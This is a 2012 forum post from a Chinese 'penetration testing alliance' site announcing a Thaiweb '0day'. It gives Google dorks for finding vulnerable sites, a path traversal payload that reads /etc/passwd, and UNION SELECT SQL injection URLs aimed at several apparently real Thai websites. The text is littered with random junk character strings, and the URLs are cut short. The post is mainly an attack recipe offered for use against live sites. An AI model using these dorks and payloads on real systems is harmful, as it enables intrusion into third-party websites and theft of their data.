中国网络渗透测试联盟

标题: Thaiweb远程文件sql注入漏洞0day [打印本页]

作者: admin    时间: 2012-12-27 08:38
标题: Thaiweb远程文件sql注入漏洞0day
Google之:- o' {* M1 K' v" l; _

' P* i9 g# i; C9 S( c! e5 pintext:powered by Thaiweb
5 \* e! a2 [0 @' f% F" O; Z
3 S$ U, Y7 V. k6 w- N' _. F- _inurl:index.php?page=board.php
8 [" Y( G* g# o& P3 s3 k* A4 _5 q$ q
" C, D& z  L3 g) U6 v ! X( L  ?2 ?: b. v5 C/ p- h5 Y; ^+ a
% m0 t$ @- X: F; F* V6 A
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd- h" c2 H' {. E; ?0 p$ b

9 w# D3 O' j- Z% ?: m! y* O
3 ^% h2 A% f* z* N9 ]
; w& I* D2 Z/ A, J' w; j( f* b利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
3 \' K' [9 L; C) {) g) T, W  t" o/ d8 W/ `) ^- X% ?: @% r* @/ x9 ~+ W
- z. |) [0 I/ k3 H$ X

$ }3 x/ O3 f$ O3 O9 h. mhttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--) p7 K" b; Y, P; k

. y8 D; b# s& `0 [5 \$ Y7 r' t4 L$ fhttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--. v" ?$ a& X+ Z" @

/ y, [6 {7 c# e$ n' Ahttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--& U9 D$ q) c: R6 }9 c' e) S) k





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2